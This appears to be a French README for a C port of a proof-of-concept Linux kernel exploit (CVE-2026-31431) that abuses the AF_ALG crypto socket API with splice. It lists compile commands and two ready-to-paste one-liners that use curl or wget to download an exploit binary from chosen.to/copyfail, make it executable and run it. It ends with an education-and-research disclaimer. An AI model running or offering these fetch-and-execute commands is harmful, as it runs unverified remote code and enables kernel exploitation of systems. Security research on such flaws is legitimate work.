
Port C d’une preuve de concept exploitant une faille de logique splice AEAD AF_ALG du noyau Linux (CVE-2026-31431) à des fins de recherche pédagogique.
Ce projet est un portage en C du prototype Python original, par offsecguy.
Il exploite l'API crypto du noyau Linux (AF_ALG) en utilisant :
authencesn(hmac(sha256),cbc(aes))MSG_MOREsplice()La technique achemine les données d'un descripteur de fichier en lecture seule à travers une socket crypto, en les traitant morceau par morceau.
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz
gcc exp.c -o exp -lz -s -static
gcc exp.c -o exp -lz -s
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp
AF_ALG par le noyau Linuxzlib pour la décompressionCe code est fourni uniquement à des fins éducatives et de recherche.
Utilisez-le de manière responsable et uniquement sur des systèmes que vous êtes autorisé à tester.